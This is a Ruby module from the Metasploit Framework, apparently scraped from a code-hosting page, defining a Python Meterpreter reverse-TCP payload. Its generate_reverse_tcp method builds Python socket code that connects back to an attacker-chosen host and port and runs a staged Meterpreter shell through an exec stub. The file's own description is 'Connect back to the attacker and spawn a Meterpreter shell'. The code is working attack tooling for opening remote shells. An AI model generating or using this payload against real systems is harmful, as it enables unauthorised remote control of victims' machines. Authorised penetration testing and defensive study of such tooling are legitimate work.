Path: blob/master/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = :dynamic78include Msf::Payload::Single9include Msf::Payload::Python10include Msf::Payload::Python::ReverseTcp11include Msf::Payload::Python::MeterpreterLoader1213def initialize(info = {})14super(15merge_info(16info,17'Name' => 'Python Meterpreter Shell, Reverse TCP Inline',18'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',19'Author' => 'Spencer McIntyre',20'License' => MSF_LICENSE,21'Platform' => 'python',22'Arch' => ARCH_PYTHON,23'Handler' => Msf::Handler::ReverseTcp,24'Session' => Msf::Sessions::Meterpreter_Python_Python25)26)27end2829def generate_reverse_tcp(opts = {})30socket_setup = "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"31socket_setup << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"32opts[:stageless_tcp_socket_setup] = socket_setup33opts[:stageless] = true3435met = stage_meterpreter(opts)36py_create_exec_stub(met)37end38end394041